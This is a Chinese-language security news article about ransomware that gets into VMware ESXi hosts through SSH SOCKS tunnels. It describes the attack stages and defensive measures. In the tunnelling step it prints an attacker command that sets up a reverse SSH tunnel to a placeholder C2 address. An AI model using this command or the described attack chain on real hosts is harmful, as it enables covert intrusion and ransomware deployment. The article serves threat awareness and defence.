新的勒索软件通过SSH隧道攻击VMware ESXi主机

admin 2025年1月25日01:55:59评论15 views字数 1515阅读5分3秒阅读模式

更多全球网络安全资讯尽在邑安全

新的勒索软件通过SSH隧道攻击VMware ESXi主机

新的勒索软件菌株通过设置 SSH 隧道并将恶意流量隐藏在合法活动中,悄悄渗透到 VMware ESXi 主机中。

这种隐蔽策略允许攻击者访问关键的虚拟机环境,而无需触发许多标准警报或检测系统来监控更传统的网络路径。

由于 ESXi 设备通常不受监控,因此网络犯罪分子抓住机会隐藏在众目睽睽之下,泄露数据,并以最小的干扰锁定虚拟机。

虚拟化基础设施是勒索软件行为者的诱人目标,因为虚拟机的价值很高,而且如果攻击者夺取控制权,可能会造成快速损害。

Sygnia 说,犯罪分子可以专注于 ESXi 主机本身,从而能够在一次协同攻击中加密所有虚拟磁盘,而不是单独破坏每个来宾系统。

一旦虚拟机无法访问,组织就会发现自己在争先恐后地恢复关键功能或考虑付款要求。在这些事件中,业务连续性、声誉和收入都面临重大危险。

除了加密之外,攻击者还使用 ESXi 服务器作为枢轴点,在企业网络内部获得更广泛的访问权限。通过使用 SSH 创建 SOCKS 隧道,威胁行为者可以横向移动并将流量与日常管理操作混合。

受感染的系统很少重新启动,并且通常记录不足,成为安装持久性后门程序的理想环境。

攻击的工作原理

  1. 初始访问
    攻击者通过利用漏洞(例如 CVE-2021-21974)或使用被盗的管理凭据来访问 VMware ESXi 主机。这些方法允许他们绕过身份验证并建立对设备的控制。

  2. 建立 SSH 隧道
    一旦进入,攻击者就会使用 ESXi 设备的本机 SSH 功能来创建 SOCKS 隧道。这通常通过如下命令实现:text此远程端口转发设置将受感染的 ESXi 主机链接到攻击者的命令和控制 (C2) 服务器,使他们能够通过主机路由恶意流量,同时混入合法网络活动。
    ssh –fN -R 127.0.0.1:<SOCKS port> <user>@<C2 IP address>

  3. 持久性
    ESXi 设备很少重启,因此非常适合在网络内维护半持久性后门。SSH 隧道保持活动状态,允许攻击者在不被发现的情况下继续他们的操作。

  4. 侦察和横向移动
    攻击者使用已建立的隧道在受感染的网络内执行侦察,识别其他目标和敏感数据。

  5. 加密和勒索部署
    在收集情报后,攻击者部署勒索软件负载来加密关键的虚拟机文件,例如(虚拟磁盘文件)和(分页文件)。这使得整个虚拟化环境无法访问。然后发出赎金要求,通常伴随着数据泄露或公开披露的威胁。
    .vmdk.vmem

ESXi 服务器的日志记录架构使取证调查复杂化。与集中式 syslog 系统不同,ESXi 将日志分发到多个文件,例如(shell 活动)和(身份验证事件)。/var/log/shell.log/var/log/auth.log

这种碎片化需要调查人员将来自各种来源的证据拼凑在一起。此外,使用 SSH 隧道将恶意活动掩盖为正常的管理流量。由于许多组织不会主动监控其 ESXi 环境,因此这些攻击可能会持续很长时间而不被发现。

研究人员建议限制管理权限并确保在 ESXi 主机上默认禁用 SSH,仅在绝对必要时激活它。定期应用补丁来修复漏洞,尤其是那些支持远程代码执行或凭据盗窃的漏洞,也至关重要。强身份验证策略(包括多因素方法)可降低暴力破解管理凭据的可能性。

新一波勒索软件浪潮表明,攻击者不断适应,以利用虚拟基础架构中被忽视的角落。

通过在 ESXi 环境中优先考虑安全控制并密切监控 SSH 使用情况,组织可以领先于威胁并保持其虚拟化操作的可靠性。

原文来自: cybersecuritynews.com

原文链接: https://cybersecuritynews.com/ransomware-attacking-vmware-esxi-hosts/

原文始发于微信公众号(邑安全):新的勒索软件通过SSH隧道攻击VMware ESXi主机

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年1月25日01:55:59
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   新的勒索软件通过SSH隧道攻击VMware ESXi主机http://cn-sec.com/archives/3671308.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息